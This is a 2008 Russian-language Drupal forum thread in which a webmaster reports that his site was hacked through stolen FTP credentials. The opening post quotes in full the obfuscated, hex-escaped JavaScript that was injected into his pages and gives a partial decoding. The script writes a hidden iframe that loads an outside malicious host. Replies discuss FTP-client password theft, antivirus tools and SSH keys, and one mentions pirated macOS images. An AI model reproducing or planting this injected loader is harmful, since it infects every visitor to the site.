троян на трояне трояном погоняет :((((

Главные вкладки

Аватар пользователя Cyb_ Cyb_ 13 апреля 2008 в 22:39

сегодня вдруг обнаружил что сайт не работает. какая-то (самоцензура) залила через фтп вот такую хрень (без знаков подчеркивания Smile ):

<_Script>
<_!--
var d=document;
eval( unescape( "%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%5b%69%5d%3b%69%66%28%20%28%65%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%65%21%3d%27%63%31%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d%7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b%0d%0a%69%66%20%28%21%6d%79%69%61%29%20%7b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%32%36%38%38%31%29%2b%27%38%39%31%33%33%61%36%39%64%61%64%5c%27%20%77%69%64%74%68%3d%37%30%31%20%68%65%69%67%68%74%3d%31%38%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
//-->
<_/Script><_script>check_content()<_/script>

%% в вольном переводе означают:
function check_content(){ var i = 0;while(document.getElementsByTagName('iframe').length){var el = document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1' ) {el.parentNode.removeChild(el);} else i++;}}check_content(); if (!myia) { d.write('http://macat.org/'http://my-page-de.info/in.cgi?2&'+Math.round(Math.random()*126881)+'89133a69dad\'');}var myia=true;

там Java/ClassLoader.AP троян

покоцаны:
httpdocs/: index.php
httpsdocs/: index.html
и 13 файлов error_docs/

судя по логам перезаливка была на автоматическом режиме

все пароли поменял, все перевернул Sad
обидно блин

Комментарии

Аватар пользователя Cyb_ Cyb_ 13 апреля 2008 в 23:54

пользовал FAR

пока заблокировал диапазон айпи фаерволом. подумываю как бы отловить, подскажите ссылкой софтину актуальную?

Аватар пользователя PVasili PVasili 14 апреля 2008 в 0:02

Проблемы 2 дырки на сервере(Drupal) или провайдере или на локальной машине(вирусняк).
1) Логи на провайдере как, когда и куда залили. Права на файлы. Душевный разговор с провайдером.
2) AVZ (в писк) и антивирус. Фаервол не всегда спасает(не панацея)...

Аватар пользователя bogutski bogutski 14 апреля 2008 в 0:44

Какие альтернативы Тоталу? Как из тотала и на каком моменте пароли могут уйти? (при варианте что нет фаервола)

У меня фаервол/антивирь Панда. вполне хороша, но вот только как ее расковырять не знаю. может кто имеет в этом опыт?

Аватар пользователя pihel pihel 14 апреля 2008 в 8:53

тотал командер хранит пароли в открытом виде гдето в папке виндоус. Злоумышленник получил доступ к вашей машине и заполучил пароли фтп (скорей всего)
Избавление: сменить пароли, исопльзовать для работы с фтп предназначенные для этого программы (smartFTP, CuteFTP)

Аватар пользователя Pozniy Pozniy 14 апреля 2008 в 0:59

Споймал троян своей локальной рабочей машиной на каком либо из сайтов во время веб-серфинга. Год назад имел аналогичную проблему ( http://www.drupal.ru/node/5735 ). Троян запускается скриптом из другого сайта загружает исполнительный модуль вируса, тырит все личные эккаунтовые данные из абсолютного большинства пользуемых у нас программ (аутлук, аутлукэкспрес, бат, эксплорер, IE, фар, командер, флешфхп, файрфокс, т.д. и т.п.) и отсылает их пхп-шной почтой по специальному адресу. (Тогда у меня стоял аутпост и хваленый нод32 - дигер схавал их без напряжения и не подавился). Некоторые трояны такого типа после отработки могут себя удалять (так что антивирус уже ничего не найдет), другие втискиваются в реестр в... раздел файрвола. Так что менять нужно не только пароли фтп, а абсолютно все пароли на всех эккаунтах (фтп, почтовых, регистрационных сайтов, т.д. и т.п.) у меня им было около двух сотен на смену всего этого ушло около трех недель.

Спокойно жить начал после того, как купил и поставил Касперского (AVK) дополнительно к Аутпосту (нод32 выкинул наф...). (Правда, пришлось предварительно сменить машину на двухядерную, дабы касперу мощи хватало и другим оставалось). С тех пор неоднократно обнаруживались инфицирования даже вполне приличных сайтов...

И ещё. Пароли наиболее важных эккаунтов теперь хранятся в текстовом файле и вводятся вручную при инициализации (кроме почты и несущественных регистраций на сайтах).

Такие пирожки с котятами... Друпал здесь стопудово не причем.

Аватар пользователя flecus flecus 14 апреля 2008 в 22:28

Для заливки контента юзайте winscp

Возможности программы:

* Графический интерфейс
* Интерфейс переведён на несколько языков
* Интеграция с ОС Windows (drag&drop, поддержка схем URL, ярлыки)
* Все основные файловые операции
* Поддержка протоколов SFTP и SCP поверх как SSH-1, так и SSH-2
* Автоматизация при помощи скриптов и интерфейса командной строки
* Синхронизация папок по нескольким автоматическим и полуавтоматическим алгоритмам
* Встроенный текстовый редактор
* Поддержка авторизации по паролю, открытым ключом, Керберос (GSS) и keyboard-interactive
* Интеграция с Pageant (PuTTY Agent) для поддержки авторизации по открытым ключам
* Два пользовательских интерфейса: как в проводнике Windows Explorer и как в Norton Commander
* Возможность сохранять настройки соединений.
* Возможность работы с использованием файла конфигурации вместо реестра, что удобно при запуске с переносных носителей.

Аватар пользователя Akzhan Akzhan 14 апреля 2008 в 23:07

Любой широко распространённый ftp-клиент подвержен атакам троянских приложений (far, cutftp, total commander etc.).

Крайне рекомендую использовать SSH-протокол, и RSA-ключи для подтверждения подлинности с подтверждением с использованием ключевой фразы.

Например, может помочь Far + WinSCP FAR Plugin, собственно WinSCP, и, конечно, в довесок - Putty + PuTTYgen + PSCP + Pageant.

Аватар пользователя Sparta Sparta 15 апреля 2008 в 8:54

Жизнь без вирусов и антивирусных тормозов = MAC OSX (на PC) для графики и web-серфинга + WIN XP (с начисто отрубленной сетью) для остального.
Рекомендую. За несколько лет активной работы в сети ни одного вируса или трояна. Варезные и прочие нашпигованные вирусняком сайты юзаю - ежедневно и по-многу. Включая те, которые google помечает как "Опасные для Вашего компьютера".

Аватар пользователя Гость Гость (не проверено) 15 апреля 2008 в 11:24

Стоит нормальная рабочая нода32, ни одного вируса сам своей машинкой не схряпал в течении уже более 2-х лет. При ентом специально серфил потенциально опасные сайты осликом - никаких проблем. Те же кто пользуются другими решениями иль базы постоянно не обновляют постоянно натыкаются на злостное кол-во вирусяк.
Ежели машинка уже больная, то поможет только AVZ+ virusinfo ( ежели совсем жесткая бяка).

З.Ы. Постоянные споры об антивирях чессна достали, зашел на офф. сайт ноды скачал инфу о тестах и сравнениях с другими антивирями и всем споршикам даю почитать перед дискуссией Wink

Аватар пользователя Pozniy Pozniy 15 апреля 2008 в 16:17

>vrazbros: Pozniy откуда информация что инфу могут украть даже из Far ?

Из базы данных на этот тип вируса (который был у меня) Каспера. А что в Far такого волшебного? Вирус писали люди грамотные и "из местных", специально заточен на популярные сервисные программы рунетовских вебмастеров.

Аватар пользователя Sparta Sparta 16 апреля 2008 в 3:26

PVasili,
охотно, (сорри за офтоп):
http://forum.insanelymac.com/index.php?showforum=157
здесь есть все.
У меня стоит Leo4All. Пошел сразу и без танцев с бубном. Функциональность не хуже чем на моем же Mac Mini (разве что нет пульта:)), а вот скорость на intel8400 и 8800gts - просто зашкаливает! Только что вышла новая версия другой сборки - Kalyway v8. Еще не робовал, предыдущая (v7) тоже встала сразу, но понравилась меньше Leo4All.
Образ установочного диска 4,38 Гб ищите на торрентах.

Аватар пользователя Akzhan Akzhan 16 апреля 2008 в 3:38

создайте здесь в своём блоге отдельную запись про MacOS X, может быть интересно.

Мне, как разработчику, нельзя пока уходить с Windows Vista -мне нужно тестирование Windows Vista Gadgets и т.п. like .NET FW.

Меня лично всякие вирусы не донимают, это проблема пользователелей иных классов, да и Unix у меня идёт одним кликом
http://andlinux.org/

кстати, крайне рекомендую вместо denwer.

Аватар пользователя jason32 jason32 16 апреля 2008 в 16:54

пользуюсь Оутпост+ Filezilla + Опера - пока ни разу FTP-пароли не пёрли, в Тотале пароли хранить нельзя - это уже дети знают